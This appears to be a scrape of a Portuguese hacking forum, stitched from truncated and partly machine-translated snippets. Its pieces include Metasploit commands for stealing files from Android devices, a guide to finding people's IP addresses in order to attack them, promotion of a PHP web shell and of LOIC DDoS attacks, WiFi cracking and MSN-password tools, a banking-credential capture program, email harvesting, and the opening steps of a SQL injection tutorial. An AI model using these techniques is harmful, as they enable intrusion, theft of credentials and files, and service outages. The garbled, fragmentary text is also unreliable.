E indispensável hoje em dia identificar o tipo de criptografia.
Nesse tópico vou lista os tipos de criptografias usados em senhas:
Mais comuns
md5: aba8c5f77c63653318ac43fe1a1d54ff
md4: 67e36c3b402837bc8d9bc1c982233ad7
md2: d1c34d62fc8a2ffb68536d82cca44334
sha1: 59f86a19c4b2f8d80e5b14abc351d050dea188eb
Créditos: Bhior
sha256: a94a011d426052a7c81692f0d3f8032424d9178d419acb2fcd cea3160383f602
sha384: 6dba2d81242cc76c0ea17f3da21cb7d47439a65074fbe679dc 92394b4f5c6b954436e869248df9b60412ebee97d41fcd
sha512: 48fcd376a0eb0227a6d7bc3a28ef826f5c2bc4a62fe0fc2139 e7427ccb86851f2030e5a855b2a501b98e70f0040d59271142 6b6798cb8be110bf4dc75724cd2b
LM: 7bc213962f4bcef4f9393d97e7a1873c
NT: e6dd58312b8f14b889be39d8db2007fd
base_64: cGFuZGVtaWM
rot_13: cnaqrzvp
Menos comuns:
crc32b: 968c0

Pode tirar proveito de uma aplicação web vulnerável. Ao utilizar este usuário pode executar software d
- root@bt:~# /opt/framework3/msf3/msfconsole
- msf > use gather/android_htmlfileprovider
- msf auxiliary(android_htmlfileprovider) >
- msf auxiliary(android_htmlfileprovider) > show options
- FILES (arquivos do Android que queremos roubar)
- SRVHOST (IP local que estará a espera de conexões)
- SRVPORT (A porta que estará a espera de conexões)
- SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
- SSLVersion (Se tiver ativado a opção acima, indique a versão do SSL )
- URIPATH (A URI que será utilizada)

Pode tirar proveito de uma aplicação web vulnerável. Ao utilizar este usuário pode executar software d
Muitas vezes você precisa ver alguns diretórios web. Mas é difícil encontrá-lo fora como um servidor pode conter incontável numero de diretórios nele.
Mas um buraco importante neste segurança é o Robots.txt 
O que é Robots.txt
Robot.txt é o arquivo no [wwwroot] de um servidor para definir os Bots a funcionalidade do site. Há muitos Bots na internet, como os mais famosos são de pesquisa do Google Motor BOT aka Google Aranha, Yahoo Bot Search Engine e muitos outros. querobots.txt fazer é que dá ordens para o Bot sobre como aranha no site ....
Agora você pode perguntar o que é o uso de Robots.txt arquivo.
Bem, é usado por webmasters para adicionar funcionalidade para os bots futuras no site e lá também para esconder os diretórios do site e onde o Bot não deve ir e aranha.
Analisando Robots.txt para coisas Hacking
Bem, é muito simples, a primeira pergunta que você
Traduzido pelo Google (não revisado) Preguiça.
Algumas pessoas podem ter dúvidas sobre este guia
Por que eu iria querer adquirir o endereço IP de uma pessoa? O que posso fazer com ele?
Quando você adquirir o endereço IP de alguém, você adquirir um pequeno pedaço de informação sobre eles, o que por sua vez pode se tornar um grande pedaço de informação sobre eles. Várias coisas que você pode fazer com faixas de IP de uma pessoa a partir de algo tão simples como descobrir de onde eles são, para explorar o seu computador e arrancar-los offline.
Não há já vários guias encontrado em HF que pode me dizer como explorar endereço IP de uma pessoa?
Na verdade, há, no entanto, por que se preocupar rastreamento através de uma variedade de tópicos apenas para encontrar um método, quando todos podiam estar aqui?
Conteúdo
1. Recuperando um IP de um endereço de e-mail
2.Retrieving um endereço IP do Skype
3. Recuperando um endereço IP do MSN
Vamos começar.
1. Obtenção de um endereço IP de um e-mail.
Como encontrar o IP
IP ao usar o Gmail
Spoiler (clique para esconder)
Entrar na sua conta do Gmail com seu nome de usuário e senha.
Abra o mail. Para exibir os cabeçalhos de e-mail, clique no triângulo invertido ao lado de Responder. Selecione Mostrar Orginal: http://i.imgur.com/LGcGA.png
Consulte 'Qual é o seu IP um?' encontrado abaixo para ver qual IP é deles!
IP ao usar Yahoo!
Spoiler (clique para esconder)
Vá para o e-mail que deseja acompanhar o endereço de e se
Ani-Shell é uma simples shell PHP, com recursos exclusivos como Mass Mailer, simples Fuzzer Web Server e um DDoser. Ani-shell tem imensas capacidades e têm sido escritos com alguns padrões de codificação em mente para melhor edição e personalização.
Características:
Shell
Mass Mailer
DDos
Web-Server Fu

Estou adicionando algumas ferramentas que podem ser utilizadas para hackear uma rede protegida WIFI. Dentre elas, existe uma que pode quebrar criptografia 128-bit, ela se chama WPA-PSK. Ai vai:
Easy Wifi Radar
Aircrack 2,3 Radar 802,11 sniffer
Wifi pack ferramentas
Janeiro de 2012 marca uma data importante no calendário. Protestos contra projetos de lei, partiram das ruas para a internet, uma nova onda de ataques virtuais foram realizada. O alvo, sites do governo, indústria da música e cinema global, que planejam censurar a informação. E uma técnica compartilhada na internet se mostrou muito eficaz na onda de protestos. Se trata de um programa que “bombardeia” servidores que hosepdam sites, levando a interrupção de sua atividade. Conheça o LOIC ou HOIC.
O que o LOIC faz?
O programa não invade um servidor, mas o sobrecarrega. O LOIC, quando mirado para um endereço na web, envia pedidos TCP, UDP e HTTP inválidos.
O servidor consegue ignorá-los, mas quando vários computadores miram o LOIC para o endereço, ao mesmo tempo, o servidor ficará confuso com tantas requisições, não conseguindo completar a solicitação, e negará serviço (Denial of Service, ou DoS).
Então o servidor acaba ficando Offline, indisponível por minutos ou horas, até que o processo possa reinicializar.
DoS e DDoS
DoS é a sigla para Denial of Service (Negação de serviço), e ocorre quando forçamos um servidor enviando um grande número de requisições, até que ele não consiga mais responder ao serviço, ficando fora de operação. O DDoS (Distributed Denial of Service), é o ataque em si, onde vários computadores participam da ação para gerar a negação de serviço (DoS) no alvo.
Derrubando servidores
Não pense que você sozinho irá usar a ferramenta e o website irá cair. Para bombardear o servidor, será necessário que vários computadores realizem a mesma requisição. Se você acompanhou o Anonymouspelas redes sociais, percebeu que a cada hora um novo alvo era indicado, então todos se voltavam ao ataque do endereço.
Posso ser descoberto?

Abra a Shell...
Passo 1
# apt-get install tor privoxy
Passo 2
Configure o privoxy
# nano /etc/privoxy/config
No fim do arquivo config, insira a linha:
forward-socks4a / localhost:9050 .
| Esta imagem foi redimensionada. Clique nesta barra para ver a imagem completa. A imagem original é de tamanho 800x717. |


Page 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head Fuck HotMail HAck
Fizeram isso pois antigamente muita gente tava pegando senha das pessoas no banco por keyllogers, e os keyllogers só pegam a digitação, não pegam o tecladinho virtual, e os bankers por sua vez fizeram este programa que tira uma foto da área em que vc clicou.

Está é uma imagem que tirei de quando usei esse programinha para demonstração.
Agora é so baixar e executar.
Não pesa quase nada 20kb
Baixar
- Sender Atomic Mail para o envio de newsletters de e-mail
- Atomic List Manager para edição de listas de discussão
- Gerente de Assinaturas para a manipulação atômica assinaturas automaticamente
- Atomic Mail Verifier para verificar endereços de correio electrónico
- Hunter Atomic Email para contatos coleta a partir da Internet
- Atomic Email Logger para contatos recolhimento de arquivos locais
- Explorer Atomic Newsgroup para extrair contatos em newsgroups
- Spider Web Atomic para contatos coleta de sites visitados
Primeiramente quero mostrar para vocês um site onde vocês poderam encontrar mais sobre novas vulnerabilidades, como se proteger de vulnerabilidades da web. http://www.owasp.org/ Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha. Aqui esta o site: www.site.com.br/noticias.php?id=10 Para descobrir se pode estar vulneravel, coloque ' depois do link, caso dei algum erro tem grande chance de estar vulneravel. www.site.com.br/noticias.php?id=10' Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282 Essa falha é baseada em erros. Vamos pegar o numero de colunas usando ORDER BY * É usado dessa maneira: +order+by+1 //Sem erro +order+by+2 //Sem erro +order+by+3 //Sem erro +order+by+4 //Sem erro +order+by+5 //Sem erro +order+by+6 //Erro














